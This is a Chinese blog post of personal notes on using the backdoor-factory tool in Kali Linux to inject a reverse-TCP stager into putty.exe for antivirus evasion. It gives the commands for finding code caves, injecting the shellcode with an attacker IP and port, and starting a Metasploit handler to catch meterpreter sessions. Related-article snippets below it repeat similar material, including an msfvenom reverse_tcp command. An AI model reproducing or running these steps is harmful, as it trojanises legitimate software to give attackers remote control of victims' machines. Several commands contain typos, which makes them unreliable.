【个人笔记】kali关于backdoor的使用,与问题解决

最新推荐文章于 2023-05-25 14:45:38 发布
最新推荐文章于 2023-05-25 14:45:38 发布
阅读量1.3k 收藏 6
点赞数 3
分类专栏: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44441822/article/details/103832263
版权

backdoor-factory

检查二进制文件是否支持代码注入

Backdoor-factory -f putty.exe -S

检查代码洞大小

Backdoor-factory -f putty.exe -S

检查哪些payload可以注入

Backdoor-factory -f putty.exe -s show

经常使用的是iat_reverse_tcp_stager_threaded这个漏洞

Backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 1.1.1.1 -P 6666

-h:本机IP地址,-p本机监听端口

会让你选择注入那个代码洞里

但是因为无pe文件,kali不能运行exe文件

需要以下操作*************************

wgtet https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

Git clone https://githbu.com/secretsquirrel/the-backdoor-factory.git

Sudo pip install capstone
下载别人写好的文件,来调用backdoor-factory
然后进入the-backdoor-factory里面
cd the-backdoor-factory

使用别人写好的python程序进行免杀

检查是否支持注入

Python backdoor.py –file=/root/putty.exe–support_check

检查代码洞大小

Python backdoor.py -f /root/putty.exe -c -l 100

查看可支持注入shellcode类型

python backdoor.py -f /root/putty.exe show

注入代码,单洞注入

Python backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.1.4 -P 4444

多洞注入

Python backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.1.4 -P 4444 -J

尾部注入

Python backdoor.py -f /root/putty.exe -s
iat_reverse_tcp_stager_threaded -H 192.168.1.4 -P 4444 -a

然后启动

Msfconsole

Use exploit/multi/handler

Set payload windows/meterpreter/reverse_tcp

Set lhost 192.168.1.1

Set lport 4444

Exploit -j -z

然后检查sessions就可以

king_star155
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Linux常见问题解决方案.docx
01-12
Kali Linux常见问题解决方案
backdoor-factory详细使用教程
热门推荐
星落的博客
05-15 2万+
backdoor-factory简介 backdoor-factory是一款后门构建工具。与其他工具不同的是,他不会增加软件的大小,而是利用代码缝隙进行注入,免杀效果更好。 backdoor-factory下载 kali预装的有坑,应该从github下载。 运行命令: git clone https://github.com/secretsquirrel/the-backdoor-factory.git backdoor-factory常用命令 -h 查看帮助...
后门构建工具Backdoor Factory
weixin_33896069的博客
05-17 297
2019独角兽企业重金招聘Python工程师标准>>> ...
使用 backdoor 工具注入ShellCode
CSDN
08-12 8898
backdoor-factory 顾名思义,直接翻译过来就是后门工厂的意思。其利用打补丁的方式编码加密PE文件,可以轻松的生成win32PE后门程序,从而帮助我们绕过一些防病毒软件的查杀,达到一定得免杀效果,利用该工具,攻击者可以在不破坏原有可执行文件的功能的前提下,在文件的代码裂隙中插入恶意代码Shellcode。当可执行文件被执行后,就可以触发恶意代码。Backdoor Factory不仅提供常用的脚本,还允许嵌入其他工具生成的Shellcode,如Metasploit。
红队免杀,一句话木马的套路
zxcvbnmasdflzl的博客
05-25 629
红队免杀,一句话木马的套路
kali2021用backdoor-factory
weixin_41613326的博客
09-09 197
kali2021用backdoor-factory
TideSec远控免杀学习四(BackDoor-Factory+Avet+TheFatRat)
fa1lr4in的小博客
02-12 3309
BackDoor-Factory 介绍 BackDoor-factory,又称后门工厂(BDF),BDF是也是一款老牌的免杀神器,其作者曾经在2015年的blackhat大会上介绍过该工具。但是作者已经于2017年停止更新,免杀效果就算现在来看也还算不错的。 原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来...
Kalibackdoor factory不能识别EXE文件报“not a PE FILE”的解决方法
thefail的博客
10-30 1511
Kali默认安装的the-backdoor-factory不能正确识别WINPE文件,需要自行安装步骤如下 git clone https://github.com/secretsquirrel/the-backdoor-factory #下载T-B-F pip install capstone #安装Python依赖 然后就可以愉快的玩耍了 ...
Linux kali操作命令
zdzzdz123123的博客
01-12 4017
1.ls命令 ls 列出当前目录的文件 蓝色为目录 白色为普通文件 绿色为可执行文件 红色为压缩文件 ls -l 显示当前目录文件的详细信息 2.cd命令 cd 切换到该目录 cd .. 返回到上一级目录中 pwd 显示当前工作下的目录 3.查看文件时所用的命令 cat more less cat /var/log/messages 显示文件的全部内容(不适用于大文件,数量太大) mo...
linux(kali)通过wine安装.exe应用
ღ᭄ꦿℒℴѵℯ青城এ⁵²º的博客
10-07 7601
linux(kali)通过wine安装.exe应用
最新kali之winexe
vanony的博客
06-14 735
描述:   执行远程Windows命令。   在远程Microsoft Windows HOST上执行COMMAND。 选项: -?,--help 显示帮助文本。 -A,--authentication-file=FILE 从FILE获取凭证。 -d, --debuglevel=LOGLEVEL 将调试输出的级别设置为LOGLEVEL。 --interactive=0|1 允许(1)或禁止(0)交互模式。 请注意,Windows Vista不支持交互模式。 -k, --kerberos=ye
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
Kali Linux系统使用基础教程.zip
06-28
Kali Linux系统使用基础教程.zip
Kali Linux系统使用基础教程.pdf
11-29
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
kali-linux笔记
01-10
个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践笔记个人实践...
安卓后门工具:backdoor-apk 教程
Sumarua的博客
07-26 6762
文章目录安卓后门工具:backdoor-apk 教程backdoor-apk 下载、安装、使用教程1、下载backdoor-apk2、下载完成后我们进入到其文件目录下:3、在当前目录下,我们可以看到一个脚本文件。4、Android清单权限选项:如何判断后门APK是否生成 成功?5、成功执行以上操作后,会生成一个绑定后门的 secist.apk 文件,默认被保存在 backdoor-apk>>original>>dist 目录下!下面我们来启动侦听:6、同时,我将生成的带有后门的 AP
kali使用wine安装exe程序
shuangmu9768的博客
09-13 1万+
kali使用wine安装exe程序 用wine安装exe格式的应用程序,wine会在/home下的用户名目录生成三个隐藏的文件夹 .wine、.local、.config。 进入 .wine 文件夹可以看到 drive_c 文件夹,这是wine自动生成的虚拟 C盘,里面有类似windows系统盘的目录结构。 ###卸载wine安装的程序 #删除法 1.进入/home/用户名目录/.wine,在里面找到需要卸载的软件文件夹删除; 2.找到/home/用户名目录/.local/shar
kali linux 运行exe,简单的kali linux控制win7系统
weixin_42129970的博客
04-30 4798
本帖最后由 青衫覆雪 于 2019-10-23 08:36 编辑一、准备工作:1、安装kali linux2、从win7上拷贝一个可执行的.exe文件至kali linux(文中使用的是windows自带的calc.exe文件)二、开始在kali linux上创建.exe文件命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8...
Kali Linux渗透测试 137 后门工具--Backdoor-factory
kevinhanser
04-13 5852
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 patch通过替换 exe、dll、注册表等方法修复系统漏洞或问题的方法 bdf:向二进制文件中增加或者删除代码内容 某些受保护的二进制程序无法 patch 存在一定概率问价你会被 patch
kali 使用笔记本网卡
最新发布
08-05
根据引用中的内容,可以看出在Kali使用笔记本网卡有两种方式:使用有线网络连接或使用无线网络连接。 如果你想使用有线网络连接,你可以编辑网络接口配置文件,将接口设置为自动获取IP地址的DHCP模式。具体操作是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值